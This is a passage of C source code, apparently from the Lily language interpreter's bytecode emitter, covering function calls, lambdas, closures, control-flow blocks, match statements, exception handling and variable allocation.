unless something needs it. Assume that if the tree has a parent, something needs a value. */ if (ast->parent == NULL) ast->result = NULL; else { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Function needed to return a value, but did not.\n", ""); } emit->code[emit->code_pos+i] = -1; } emit->code_pos += 6 + cs->arg_count; } static void end_call(lily_emit_state *emit, lily_emit_call_state *cs) { emit->call_values_pos -= cs->arg_count; emit->call_state = cs; } /* eval_call This handles doing calls to what should be a function. */ static void eval_call(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_tree_type first_t = ast->arg_start->tree_type; /* Variants are created by calling them in a function-like manner, so the parser adds them as if they were functions. They're not. */ if (first_t == tree_variant) { eval_variant(emit, ast, expect_type, did_resolve); return; } int saved_ts_adjust = lily_ts_raise_ceiling(emit->ts); lily_emit_call_state *cs; cs = begin_call(emit, ast); eval_verify_call_args(emit, cs, expect_type, did_resolve); write_call(emit, cs); end_call(emit, cs); lily_ts_lower_ceiling(emit->ts, saved_ts_adjust); } /* emit_nonlocal_var This handles vars that are not local and are on the right hand side of an expression. This handles loading both literals and globals into a local register. */ static void emit_nonlocal_var(lily_emit_state *emit, lily_ast *ast) { lily_storage *ret; int opcode; if (ast->tree_type == tree_global_var) opcode = o_get_global; else opcode = o_get_readonly; ret = get_storage(emit, ast->sym->type); if (opcode != o_get_global) ret->flags |= SYM_NOT_ASSIGNABLE; write_4(emit, opcode, ast->line_num, ast->sym->reg_spot, ret->reg_spot); ast->result = (lily_sym *)ret; } static void eval_variant(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_storage *result = NULL; if (ast->tree_type == tree_call) { ast->result = NULL; /* The first arg is actually the variant. */ lily_ast *variant_tree = ast->arg_start; lily_class *variant_class = variant_tree->variant_class; lily_type *variant_type = variant_class->variant_type; /* This is necessary because ast->item is used for retrieving info if there is an error. */ ast->item = (lily_item *)variant_class; if (variant_type->subtype_count == 1) lily_raise(emit->raiser, lily_SyntaxError, "Variant class %s should not get args.\n", variant_class->name); int save_ceiling = lily_ts_raise_ceiling(emit->ts); lily_emit_call_state *cs; cs = begin_call(emit, ast); eval_verify_call_args(emit, cs, expect_type, did_resolve); lily_type *result_type = variant_class->variant_type->subtypes[0]; if (result_type->flags & TYPE_IS_UNRESOLVED) result_type = lily_ts_resolve(emit->ts, result_type); /* This will cause all of the args to be put together in a tuple. The tuple will be put into emit->call_values as the most recent value. */ condense_args(emit, cs, result_type, 0, cs->arg_count); result = (lily_storage *)emit->call_values[emit->call_values_pos - 1]; end_call(emit, cs); lily_ts_lower_ceiling(emit->ts, save_ceiling); } else { /* Did this need arguments? It was used incorrectly if so. */ lily_type *variant_init_type = ast->variant_class->variant_type; if (variant_init_type->subtype_count != 0) lily_raise(emit->raiser, lily_SyntaxError, "Variant class %s needs %d arg(s).\n", ast->variant_class->name, variant_init_type->subtype_count - 1); /* If a variant type takes no arguments, then it's essentially an empty container. It would be rather silly to have a bunch of UNIQUE empty containers (which will always be empty). So the interpreter creates a literal and hands that off. */ lily_type *variant_type = ast->variant_class->variant_type; lily_tie *variant_lit = lily_get_variant_literal(emit->symtab, variant_type); result = get_storage(emit, variant_type); write_4(emit, o_get_readonly, ast->line_num, variant_lit->reg_spot, result->reg_spot); } ast->result = (lily_sym *)result; } static void eval_lambda(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { char *lambda_body = lily_membuf_get(emit->ast_membuf, ast->membuf_pos); if (expect_type && expect_type->cls->id == SYM_CLASS_GENERIC && did_resolve == 0) { expect_type = lily_ts_easy_resolve(emit->ts, expect_type); did_resolve = 1; } if (expect_type && expect_type->cls->id != SYM_CLASS_FUNCTION) expect_type = NULL; lily_sym *lambda_result = (lily_sym *)lily_parser_lambda_eval(emit->parser, ast->line_num, lambda_body, expect_type, did_resolve); lily_storage *s = get_storage(emit, lambda_result->type); if (emit->closed_pos) { /* Assume that the lambda uses either upvalues or is inside of a class and uses self. */ close_over_sym(emit, lambda_result); /* This will create a copy of the function (the copy will get a shallow copy of upvalues to use). The code transformer will later rewrite the upcoming lambda access to use the upvalue copy. */ write_4(emit, o_create_function, lambda_result->reg_spot, 0, emit->closed_pos - 1); inject_patch_into_block(emit, find_deepest_func(emit), emit->code_pos - 2); write_4(emit, o_get_upvalue, ast->line_num, emit->closed_pos - 1, s->reg_spot); } else { write_4(emit, o_get_readonly, ast->line_num, lambda_result->reg_spot, s->reg_spot); } ast->result = (lily_sym *)s; } void eval_self(lily_emit_state *emit, lily_ast *ast) { ast->result = (lily_sym *)emit->block->self; } void eval_upvalue(lily_emit_state *emit, lily_ast *ast) { lily_sym *sym = ast->sym; int i; for (i = 0;i < emit->closed_pos;i++) if (emit->closed_syms[i] == sym) break; lily_storage *s = get_storage(emit, sym->type); write_4(emit, o_get_upvalue, ast->line_num, i, s->reg_spot); ast->result = (lily_sym *)s; } void eval_open_upvalue(lily_emit_state *emit, lily_ast *ast) { lily_sym *sym = ast->sym; close_over_sym(emit, ast->sym); lily_storage *result = get_storage(emit, sym->type); write_4(emit, o_get_upvalue, ast->line_num, emit->closed_pos - 1, result->reg_spot); ast->result = (lily_sym *)result; } /* eval_tree Magically determine what function actually handles the given ast. */ static void eval_tree(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { if (ast->tree_type == tree_global_var || ast->tree_type == tree_literal || ast->tree_type == tree_defined_func || ast->tree_type == tree_inherited_new) emit_nonlocal_var(emit, ast); else if (ast->tree_type == tree_call) eval_call(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_binary) { if (ast->op >= expr_assign) { lily_tree_type left_tt = ast->left->tree_type; if (left_tt == tree_local_var || left_tt == tree_global_var) eval_assign(emit, ast); else if (left_tt == tree_subscript) eval_sub_assign(emit, ast); else if (left_tt == tree_oo_access) eval_oo_assign(emit, ast); else if (left_tt == tree_property) eval_property_assign(emit, ast); else if (left_tt == tree_upvalue || left_tt == tree_open_upvalue) eval_upvalue_assign(emit, ast); else /* Let eval_assign say that it's wrong. */ eval_assign(emit, ast); assign_post_check(emit, ast); } else if (ast->op == expr_logical_or || ast->op == expr_logical_and) eval_logical_op(emit, ast); else { if (ast->left->tree_type != tree_local_var) eval_tree(emit, ast->left, NULL, 1); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, ast->left->result->type, 1); emit_binary_op(emit, ast); } } else if (ast->tree_type == tree_parenth) { if (ast->arg_start->tree_type != tree_local_var) eval_tree(emit, ast->arg_start, expect_type, 1); ast->result = ast->arg_start->result; } else if (ast->tree_type == tree_unary) { if (ast->left->tree_type != tree_local_var) eval_tree(emit, ast->left, expect_type, 1); eval_unary_op(emit, ast); } else if (ast->tree_type == tree_list) eval_build_list(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_hash) eval_build_hash(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_tuple) eval_build_tuple(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_subscript) eval_subscript(emit, ast, expect_type); else if (ast->tree_type == tree_typecast) eval_typecast(emit, ast); else if (ast->tree_type == tree_oo_access) eval_oo_access(emit, ast); else if (ast->tree_type == tree_property) eval_property(emit, ast); else if (ast->tree_type == tree_variant) eval_variant(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_lambda) eval_lambda(emit, ast, expect_type, did_resolve); else if (ast->tree_type == tree_self) eval_self(emit, ast); else if (ast->tree_type == tree_upvalue) eval_upvalue(emit, ast); else if (ast->tree_type == tree_open_upvalue) eval_open_upvalue(emit, ast); } /*****************************************************************************/ /* Exported functions */ /*****************************************************************************/ /* lily_emit_change_block_to This is called when the parser would like to change the current block into another block type. One example is when the parser sees 'elif'. In that case, it wants to change the current block into 'BLOCK_IF_ELIF'. */ void lily_emit_change_block_to(lily_emit_state *emit, int new_type) { int current_type = emit->block->block_type; int save_jump; if (new_type == BLOCK_IF_ELIF || new_type == BLOCK_IF_ELSE) { char *block_name; if (new_type == BLOCK_IF_ELIF) block_name = "elif"; else block_name = "else"; if (current_type != BLOCK_IF && current_type != BLOCK_IF_ELIF) lily_raise(emit->raiser, lily_SyntaxError, "'%s' without 'if'.\n", block_name); if (current_type == BLOCK_IF_ELSE) lily_raise(emit->raiser, lily_SyntaxError, "'%s' after 'else'.\n", block_name); lily_var *v = emit->block->var_start; if (v != emit->symtab->active_import->var_chain) lily_hide_block_vars(emit->symtab, v); } else if (new_type == BLOCK_TRY_EXCEPT) { if (current_type != BLOCK_TRY && current_type != BLOCK_TRY_EXCEPT) lily_raise(emit->raiser, lily_SyntaxError, "'except' outside 'try'.\n"); /* If nothing in the 'try' block raises an error, the vm needs to be told to unregister the 'try' block since will become unreachable when the jump below occurs. */ if (current_type == BLOCK_TRY) write_1(emit, o_pop_try); } /* Transitioning between blocks is simple: First write a jump at the end of the current branch. This will get patched to the if/try's exit. */ write_2(emit, o_jump, 0); save_jump = emit->code_pos - 1; /* The last jump of the previous branch wants to know where the check for the next branch starts. It's right now. */ if (emit->patches[emit->patch_pos - 1] != -1) emit->code[emit->patches[emit->patch_pos-1]] = emit->code_pos - emit->block->jump_offset; /* else it's a fake branch from a condition that was optimized out. */ emit->patches[emit->patch_pos-1] = save_jump; emit->block->block_type = new_type; } /* lily_emit_expr This evaluates the root of the ast pool given (the expression), then clears the pool for the next expression. */ void lily_emit_eval_expr(lily_emit_state *emit, lily_ast_pool *ap) { eval_tree(emit, ap->root, NULL, 1); emit->expr_num++; lily_ast_reset_pool(ap); } /* lily_emit_eval_expr_to_var This evaluates the root of the current ast pool, then assigns the result to the given var. This is used for expressions within 'for..in', and thus the var is expected to always be an integer. This clears the ast pool for the next pass. */ void lily_emit_eval_expr_to_var(lily_emit_state *emit, lily_ast_pool *ap, lily_var *var) { lily_ast *ast = ap->root; eval_tree(emit, ast, NULL, 1); emit->expr_num++; if (ast->result->type->cls->id != SYM_CLASS_INTEGER) { lily_raise(emit->raiser, lily_SyntaxError, "Expected type 'integer', but got type '^T'.\n", ast->result->type); } /* Note: This works because the only time this is called is to handle for..in range expressions, which are always integers. */ write_4(emit, o_fast_assign, ast->line_num, ast->result->reg_spot, var->reg_spot); lily_ast_reset_pool(ap); } /* lily_emit_eval_condition This function evaluates an ast that will decide if a block should be entered. This will write o_jump_if_false which will jump to the next branch or outside the block if the ast's result is false. This is suitable for 'if', 'elif', 'while', and 'do...while'. This clears the ast pool for the next pass. */ void lily_emit_eval_condition(lily_emit_state *emit, lily_ast_pool *ap) { lily_ast *ast = ap->root; int current_type = emit->block->block_type; if ((ast->tree_type == tree_literal && condition_optimize_check(ast)) == 0) { eval_enforce_value(emit, ast, NULL, "Conditional expression has no value.\n"); ensure_valid_condition_type(emit, ast->result->type); if (current_type != BLOCK_DO_WHILE) /* If this doesn't work, add a jump which will get fixed to the next branch start or the end of the block. */ emit_jump_if(emit, ast, 0); else { /* In a 'do...while' block, the condition is at the end, so the jump is reversed: If successful, go back to the top, otherwise fall out of the loop. */ write_4(emit, o_jump_if, 1, ast->result->reg_spot, emit->loop_start); } } else { if (current_type != BLOCK_DO_WHILE) { /* Code that handles if/elif/else transitions expects each branch to write a jump. There's no easy way to tell it that none was made... so give it a fake jump. */ if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = -1; emit->patch_pos++; } else write_2(emit, o_jump, emit->loop_start); } lily_ast_reset_pool(ap); } /* lily_emit_variant_decompose This function writes out an o_variant_decompose instruction based upon the type given. The target(s) of the decompose are however many vars that the variant calls for, and pulled from the top of the symtab's vars. Assumptions: * The most recent vars that have been added to the symtab are the ones that are to get the values. * The given variant type actually has inner values (empty variants should never be sent here). */ void lily_emit_variant_decompose(lily_emit_state *emit, lily_type *variant_type) { int value_count = variant_type->subtype_count - 1; int i; write_prep(emit, 4 + value_count); emit->code[emit->code_pos ] = o_variant_decompose; emit->code[emit->code_pos+1] = *(emit->lex_linenum); emit->code[emit->code_pos+2] = emit->block->match_sym->reg_spot; emit->code[emit->code_pos+3] = value_count; /* Since this function is called immediately after declaring the last var that will receive the decompose, it's safe to pull the vars directly from symtab's var chain. */ lily_var *var_iter = emit->symtab->active_import->var_chain; /* Go down because the vars are linked from newest -> oldest. If this isn't done, then the first var will get the last value in the variant, the second will get the next-to-last value, etc. */ for (i = value_count - 1;i >= 0;i--) { emit->code[emit->code_pos+4+i] = var_iter->reg_spot; var_iter = var_iter->next; } emit->code_pos += 4 + value_count; } /* lily_emit_add_match_case This function is called by parser with a valid index of some variant class within the current match enum class. This is responsible for ensuring that a class does not have two cases for it. Additionally, this function also writes a jump at the end of every case that will be patched to the match block's end. Any vars from previous match cases are also wiped out here, as they're no longer valid now. */ int lily_emit_add_match_case(lily_emit_state *emit, int pos) { int block_offset = emit->block->match_case_start; int is_first_case = 1, ret = 1; int i; for (i = emit->block->match_case_start; i < emit->match_case_pos; i++) { if (emit->match_cases[i] == 1) { is_first_case = 0; break; } } if (emit->match_cases[block_offset + pos] == 0) { emit->match_cases[block_offset + pos] = 1; /* Every case added after the first needs to write an exit jump before any code. This makes it so the previous branch jumps outside the match instead of falling through (very bad, in this case). */ if (is_first_case == 0) { write_2(emit, o_jump, 0); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 1; emit->patch_pos++; } /* Patch the o_match_dispatch spot the corresponds with this class so that it will jump to the current location. Oh, and make sure to do it AFTER writing the jump, or the dispatch will go to the exit jump. */ emit->code[emit->block->match_code_start + pos] = emit->code_pos - emit->block->jump_offset; /* This is necessary to keep vars created from the decomposition of one class from showing up in subsequent cases. */ lily_var *v = emit->block->var_start; if (v != emit->symtab->active_import->var_chain) lily_hide_block_vars(emit->symtab, v); } else ret = 0; return ret; } /* lily_emit_eval_match_expr This function is called by parser with an expression to switch on for 'match'. This evaluates the given expression, checks it, and then sets up the current block with the appropriate information for the match. */ void lily_emit_eval_match_expr(lily_emit_state *emit, lily_ast_pool *ap) { lily_ast *ast = ap->root; lily_block *block = emit->block; eval_enforce_value(emit, ast, NULL, "Match expression has no value.\n"); if ((ast->result->type->cls->flags & CLS_ENUM_CLASS) == 0 || ast->result->type->cls->id == SYM_CLASS_ANY) { lily_raise(emit->raiser, lily_SyntaxError, "Match expression is not an enum class value.\n"); } int match_cases_needed = ast->result->type->cls->variant_size; if (emit->match_case_pos + match_cases_needed > emit->match_case_size) grow_match_cases(emit); block->match_case_start = emit->match_case_pos; /* This is how the emitter knows that no cases have been given yet. */ int i; for (i = 0;i < match_cases_needed;i++) emit->match_cases[emit->match_case_pos + i] = 0; emit->match_case_pos += match_cases_needed; block->match_code_start = emit->code_pos + 4; block->match_sym = (lily_sym *)ast->result; write_prep(emit, 4 + match_cases_needed); emit->code[emit->code_pos ] = o_match_dispatch; emit->code[emit->code_pos+1] = *(emit->lex_linenum); emit->code[emit->code_pos+2] = ast->result->reg_spot; emit->code[emit->code_pos+3] = match_cases_needed; for (i = 0;i < match_cases_needed;i++) emit->code[emit->code_pos + 4 + i] = 0; emit->code_pos += 4 + i; lily_ast_reset_pool(ap); } /* lily_emit_finalize_for_in This function takes the symbols used in a for..in loop and writes out the appropriate code to start off a for loop. This should be done at the very end of a for..in loop, after the 'by' expression has been collected. * user_loop_var: This is the user var that will have the range value written to it. * for_start: The var holding the start of the range. * for_end: The var holding the end of the range. * for_step: The var holding the step of the range. This is NULL if the user did not specify a step. * line_num: A line number for writing code to be run before the actual for code. */ void lily_emit_finalize_for_in(lily_emit_state *emit, lily_var *user_loop_var, lily_var *for_start, lily_var *for_end, lily_var *for_step, int line_num) { lily_class *cls = emit->symtab->integer_class; int have_step = (for_step != NULL); if (have_step == 0) for_step = lily_emit_new_scoped_var(emit, cls->type, "(for step)"); lily_sym *target; /* Global vars cannot be used directly, because o_for_setup and o_integer_for expect local registers. */ if (user_loop_var->function_depth == 1) target = (lily_sym *)get_storage(emit, user_loop_var->type); else target = (lily_sym *)user_loop_var; write_prep(emit, 16 + ((target != (lily_sym *)user_loop_var) * 8)); emit->code[emit->code_pos ] = o_for_setup; emit->code[emit->code_pos+1] = line_num; emit->code[emit->code_pos+2] = target->reg_spot; emit->code[emit->code_pos+3] = for_start->reg_spot; emit->code[emit->code_pos+4] = for_end->reg_spot; emit->code[emit->code_pos+5] = for_step->reg_spot; /* This value is used to determine if the step needs to be calculated. */ emit->code[emit->code_pos+6] = !have_step; if (target != (lily_sym *)user_loop_var) { emit->code[emit->code_pos+7] = o_set_global; emit->code[emit->code_pos+8] = line_num; emit->code[emit->code_pos+9] = target->reg_spot; emit->code[emit->code_pos+10] = user_loop_var->reg_spot; emit->code_pos += 4; } /* for..in is entered right after 'for' is seen. However, range values can be expressions. This needs to be fixed, or the loop will jump back up to re-eval those expressions. */ emit->loop_start = emit->code_pos+9; /* Write a jump to the inside of the loop. This prevents the value from being incremented before being seen by the inside of the loop. */ emit->code[emit->code_pos+7] = o_jump; emit->code[emit->code_pos+8] = (emit->code_pos - emit->block->jump_offset) + 16; emit->code[emit->code_pos+9] = o_integer_for; emit->code[emit->code_pos+10] = line_num; emit->code[emit->code_pos+11] = target->reg_spot; emit->code[emit->code_pos+12] = for_start->reg_spot; emit->code[emit->code_pos+13] = for_end->reg_spot; emit->code[emit->code_pos+14] = for_step->reg_spot; emit->code[emit->code_pos+15] = 0; if (target != (lily_sym *)user_loop_var) { emit->code[emit->code_pos+16] = o_set_global; emit->code[emit->code_pos+17] = line_num; emit->code[emit->code_pos+18] = target->reg_spot; emit->code[emit->code_pos+19] = user_loop_var->reg_spot; emit->code_pos += 4; } emit->code_pos += 16; if (emit->patch_pos == emit->patch_size) grow_patches(emit); int offset; if (target == (lily_sym *)user_loop_var) offset = 1; else offset = 5; emit->patches[emit->patch_pos] = emit->code_pos - offset; emit->patch_pos++; } void lily_emit_eval_lambda_body(lily_emit_state *emit, lily_ast_pool *ap, lily_type *wanted_type, int did_resolve) { if (wanted_type && wanted_type->cls->id == SYM_CLASS_GENERIC && did_resolve == 0) { wanted_type = lily_ts_easy_resolve(emit->ts, wanted_type); did_resolve = 1; } eval_tree(emit, ap->root, wanted_type, did_resolve); if (ap->root->result != NULL) { /* Type inference has to be done here, because the callers won't know to do it. This is similar to how return has to do this too. But don't error for the wrong type: Instead, let the info bubble upward to something that will know the full types in play. */ if (wanted_type != NULL && ap->root->result->type != wanted_type) type_matchup(emit, wanted_type, ap->root); write_3(emit, o_return_val, ap->root->line_num, ap->root->result->reg_spot); } /* It's important to NOT increase the count of expressions here. If it were to be increased, then the expression holding the lambda would think it isn't using any storages (and start writing over the ones that it is actually using). */ } /* lily_emit_break This writes a break (jump to the end of a loop) for the parser. Since it is called by parser, it needs to verify that it is called from within a loop. */ void lily_emit_break(lily_emit_state *emit) { if (emit->loop_start == -1) { /* This is called by parser on the source line, so do not adjust the raiser. */ lily_raise(emit->raiser, lily_SyntaxError, "'break' used outside of a loop.\n"); } if (emit->patch_pos == emit->patch_size) grow_patches(emit); write_pop_inner_try_blocks(emit); /* Write the jump, then figure out where to put it. */ write_2(emit, o_jump, 0); inject_patch_into_block(emit, find_deepest_loop(emit), emit->code_pos - 1); } /* lily_emit_continue The parser wants to write a jump to the top of the current loop (continue keyword). */ void lily_emit_continue(lily_emit_state *emit) { /* This is called by parser on the source line, so do not adjust the raiser. */ if (emit->loop_start == -1) { lily_raise(emit->raiser, lily_SyntaxError, "'continue' used outside of a loop.\n"); } write_pop_inner_try_blocks(emit); write_2(emit, o_jump, emit->loop_start); } /* lily_emit_return This handles the 'return' keyword for the parser. If the current function DOES return a value, then ast should NOT be NULL. The ast given will be evaluated and the type checked. If it does not, then ast should be NULL. */ void lily_emit_return(lily_emit_state *emit, lily_ast *ast) { if (emit->function_depth == 1) lily_raise(emit->raiser, lily_SyntaxError, "'return' used outside of a function.\n"); if (ast) { lily_type *ret_type = emit->top_function_ret; eval_enforce_value(emit, ast, ret_type, "'return' expression has no value.\n"); if (ast->result->type != ret_type && type_matchup(emit, ret_type, ast) == 0) { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "return expected type '^T' but got type '^T'.\n", ret_type, ast->result->type); } } write_pop_inner_try_blocks(emit); if (ast) { write_3(emit, o_return_val, ast->line_num, ast->result->reg_spot); emit->block->last_return = emit->code_pos; } else write_2(emit, o_return_noval, *emit->lex_linenum); } /* lily_emit_update_function_block This is called at the opening of a new class, before any user code. This writes an initialization for the hidden self variable. */ void lily_emit_update_function_block(lily_emit_state *emit, lily_class *decl_class, int generic_count, lily_type *ret_type) { emit->top_function_ret = ret_type; emit->block->generic_count = generic_count; if (decl_class) { /* The most recent function is the constructor for this class, which will always return a class instance. Since it's also the function var (and the return of a function is always [0], this works. */ lily_type *self_type = emit->block->function_var->type->subtypes[0]; lily_storage *self = get_storage(emit, self_type); emit->block->self = self; write_3(emit, o_new_instance, *emit->lex_linenum, self->reg_spot); } } /* lily_emit_try This should be called after adding a TRY block. This registers a try and mentions the line in which it starts (for debug). At the end of a 'try' block, there is an o_pop_try that gets written to unregister this try from the vm. Similarly, write_pop_try_blocks is called for each current 'try' when a continue/break/return is called to exit any current 'try' entries. */ void lily_emit_try(lily_emit_state *emit, int line_num) { write_3(emit, o_push_try, line_num, 0); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 1; emit->patch_pos++; } /* lily_emit_raise Process the given ast and write an instruction that will attempt to raise the resulting value. The ast is checked to ensure it can be raised. */ void lily_emit_raise(lily_emit_state *emit, lily_ast *ast) { eval_enforce_value(emit, ast, NULL, "'raise' expression has no value.\n"); lily_class *result_cls = ast->result->type->cls; lily_class *except_cls = lily_find_class(emit->symtab, NULL, "Exception"); if (lily_check_right_inherits_or_is(except_cls, result_cls) == 0) { lily_raise(emit->raiser, lily_SyntaxError, "Invalid class '%s' given to raise.\n", result_cls->name); } write_3(emit, o_raise, ast->line_num, ast->result->reg_spot); } /* lily_emit_except This handles writing an 'except' block. It should be called after calling to change the current block to a TRY_EXCEPT block. cls: The class that this 'except' will catch. except_var: If an 'as x' clause is specified, this is the var that will be given the exception value. If there is no clause, then the parser will send NULL. line_num: The line on which the 'except' starts. */ void lily_emit_except(lily_emit_state *emit, lily_class *cls, lily_var *except_var, int line_num) { lily_type *except_type = cls->type; lily_sym *except_sym = (lily_sym *)except_var; if (except_sym == NULL) except_sym = (lily_sym *)get_storage(emit, except_type); write_5(emit, o_except, line_num, 0, (except_var != NULL), except_sym->reg_spot); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 3; emit->patch_pos++; } /* lily_prepare_main This is called before __main__ is about to be executed (which happens at eof for normal files, or for each ?> when doing tags. This will prepare type information for __main__'s global registers, and write o_return_from_vm at the end of __main__'s code. */ void lily_prepare_main(lily_emit_state *emit, lily_import_entry *import_iter) { /* Whenever any packages are loaded, the vars are created as globals, instead of trying to create some 'backing' value. Because of that, this must work through every import loaded to discover all the globals. Additionally, the current var list must also be loaded. */ lily_function_val *f = emit->top_function; int register_count = emit->main_block->next_reg_spot; lily_register_info *info = lily_realloc(emit->top_function->reg_info, register_count * sizeof(lily_register_info)); while (import_iter) { add_var_chain_to_info(emit, info, import_iter->var_chain, NULL); import_iter = import_iter->root_next; } add_var_chain_to_info(emit, info, emit->symtab->active_import->var_chain, NULL); add_storage_chain_to_info(info, emit->block->storage_start); /* Ensure that there are at least 16 code slots after __main__'s code. It is possible for an exception to dynaload at vm time, and that will want to write initializing code into __main__ past where __main__'s code is. This may, in turn, cause code to be resized. Since __main__'s code is a shallow reference to emitter->code, that's really, really bad. This prevents that, by setting up enough space that any dynaloaded code will not be large enough to resize emitter->code. */ write_prep(emit, 16); write_1(emit, o_return_from_vm); /* To simplify things, __main__'s code IS emitter->code. There's no reason to give it a private block of code, since __main__'s code is wiped on the next pass anyway. */ f->code = emit->code; f->len = emit->code_pos; f->reg_info = info; f->reg_count = register_count; } /* lily_reset_main (tagged mode) This is called after __main__ is executed to prepare __main__ for new code. */ void lily_reset_main(lily_emit_state *emit) { emit->code_pos = 0; } /* lily_emit_enter_block Enter a block of a given type. This only handles block states, not multi/single line information. */ void lily_emit_enter_block(lily_emit_state *emit, int block_type) { lily_block *new_block; if (emit->block->next == NULL) { new_block = lily_malloc(sizeof(lily_block)); emit->block->next = new_block; new_block->prev = emit->block; new_block->next = NULL; } else new_block = emit->block->next; new_block->block_type = block_type; new_block->var_start = emit->symtab->active_import->var_chain; new_block->class_entry = NULL; new_block->self = NULL; new_block->generic_count = 0; new_block->patch_start = emit->patch_pos; if ((block_type & BLOCK_FUNCTION) == 0) { /* Non-functions will continue using the storages that the parent uses. Additionally, the same technique is used to allow loop starts to bubble upward until a function gets in the way. */ new_block->storage_start = emit->block->storage_start; new_block->jump_offset = emit->block->jump_offset; if (IS_LOOP_BLOCK(block_type)) emit->loop_start = emit->code_pos; } else { lily_var *v = emit->symtab->active_import->var_chain; if (block_type & BLOCK_CLASS) { emit->current_class = emit->symtab->active_import->class_chain; new_block->class_entry = emit->symtab->active_import->class_chain; } char *class_name; v->parent = emit->current_class; if (v->parent) class_name = v->parent->name; else class_name = NULL; lily_function_val *fval = lily_new_native_function_val( class_name, v->name); lily_tie_function(emit->symtab, v, fval); if (emit->function_depth >= 2 && (emit->block->block_type & BLOCK_CLASS) == 0 && (block_type == BLOCK_FUNCTION)) { /* This isn't a class method and it isn't a lambda. Close over the function now, on the assumption that it may use upvalues. */ close_over_sym(emit, (lily_sym *)v); write_4(emit, o_create_function, v->reg_spot, 0, emit->closed_pos - 1); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 2; emit->patch_pos++; /* THIS IS EXTREMELY IMPORTANT. This patch belongs to the current block, not the block that was just entered. If this is not done, then the block entered will write down the patch. That's bad. */ new_block->patch_start = emit->patch_pos; } new_block->next_reg_spot = 0; /* This causes vars within this imported file to be seen as global vars, instead of locals. Without this, the interpreter gets confused and thinks the imported file's globals are really upvalues. */ if (block_type != BLOCK_FILE) emit->function_depth++; emit->function_block = new_block; if (block_type & BLOCK_LAMBDA) emit->lambda_depth++; /* This function's storages start where the unused ones start, or NULL if all are currently taken. */ new_block->storage_start = emit->unused_storage_start; new_block->function_var = v; new_block->function_value = fval; new_block->last_return = -1; new_block->code_start = emit->code_pos; new_block->jump_offset = emit->code_pos; emit->top_function = fval; emit->top_var = v; } new_block->closed_start = emit->closed_pos; emit->block = new_block; } lily_block *find_block_of_type(lily_emit_state *emit, int type) { lily_block *block_iter = emit->block->prev; while (block_iter) { if (block_iter->block_type & type) break; block_iter = block_iter->prev; } return block_iter; } /* lily_emit_leave_block Leave a block. This includes a check for trying to leave from __main__. This hides vars that are no longer in scope, as well as finializing functions. */ void lily_emit_leave_block(lily_emit_state *emit) { lily_var *v; lily_block *block; int block_type; if (emit->block->prev == NULL) lily_raise(emit->raiser, lily_SyntaxError, "'}' outside of a block.\n"); block = emit->block; block_type = block->block_type; /* These blocks need to jump back up when the bottom is hit. */ if (block_type == BLOCK_WHILE || block_type == BLOCK_FOR_IN) write_2(emit, o_jump, emit->loop_start - block->jump_offset); else if (block_type == BLOCK_MATCH) { ensure_proper_match_block(emit); emit->match_case_pos = emit->block->match_case_start; } v = block->var_start; if ((block_type & BLOCK_FUNCTION) == 0) { write_block_patches(emit, emit->code_pos - block->jump_offset); lily_hide_block_vars(emit->symtab, v); } else leave_function(emit, block); emit->block = emit->block->prev; if (IS_LOOP_BLOCK(block_type)) { lily_block *prev_loop_block = find_deepest_loop(emit); emit->loop_start = (prev_loop_block) ? prev_loop_block->code_start : -1; } } /* lily_emit_write_import_call This is called by the parser after an imported file has left. The var is always the special __import__ function holding the contents of the imported file (which takes 0 args and returns nothing). */ void lily_emit_write_import_call(lily_emit_state *emit, lily_var *var) { write_prep(emit, 6); emit->code[emit->code_pos] = o_function_call; emit->code[emit->code_pos+1] = *emit->lex_linenum; /* 1 means that +3 is a readonly var's spot. */ emit->code[emit->code_pos+2] = 1; emit->code[emit->code_pos+3] = var->reg_spot; /* 0 arguments collected. */ emit->code[emit->code_pos+4] = 0; /* This does not return a value. */ emit->code[emit->code_pos+5] = -1; emit->code_pos += 6; } /* lily_emit_write_optargs This function writes o_setup_optargs for the parser. It's currently called near the beginning of any function that uses optional arguments. reg_spots: A series of pairs to write out. Each pair is a literal's register spot, then a var's register spot. count: The total number of spots to write (not the number of pairs). Parser writes optargs in pairs so the it doesn't have to potentially resize and shift things over for large optarg blocks. However, debug and vm would like optargs to be written with the literals first in a block, then the vars next in a block. */ void lily_emit_write_optargs(lily_emit_state *emit, uint16_t *reg_spots, uint16_t count) { write_prep(emit, count + 2); emit->code[emit->code_pos] = o_setup_optargs; emit->code[emit->code_pos+1] = count; emit->code_pos += 2; int i, j; for (j = 0;j < 2;j++) { for (i = j;i < count;i += 2) { emit->code[emit->code_pos] = reg_spots[i]; emit->code_pos++; } } } lily_var *lily_emit_new_scoped_var(lily_emit_state *emit, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_var(emit->symtab, type, name); if (emit->function_depth == 1) { new_var->reg_spot = emit->main_block->next_reg_spot; emit->main_block->next_reg_spot++; } else { new_var->reg_spot = emit->function_block->next_reg_spot; emit->function_block->next_reg_spot++; } new_var->function_depth = emit->function_depth; return new_var; } lily_var *lily_emit_new_define_var(lily_emit_state *emit, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_var(emit->symtab, type, name); new_var->reg_spot = emit->symtab->next_readonly_spot; emit->symtab->next_readonly_spot++; new_var->function_depth = 1; new_var->flags |= VAR_IS_READONLY; return new_var; } lily_var *lily_emit_new_dyna_define_var(lily_emit_state *emit, 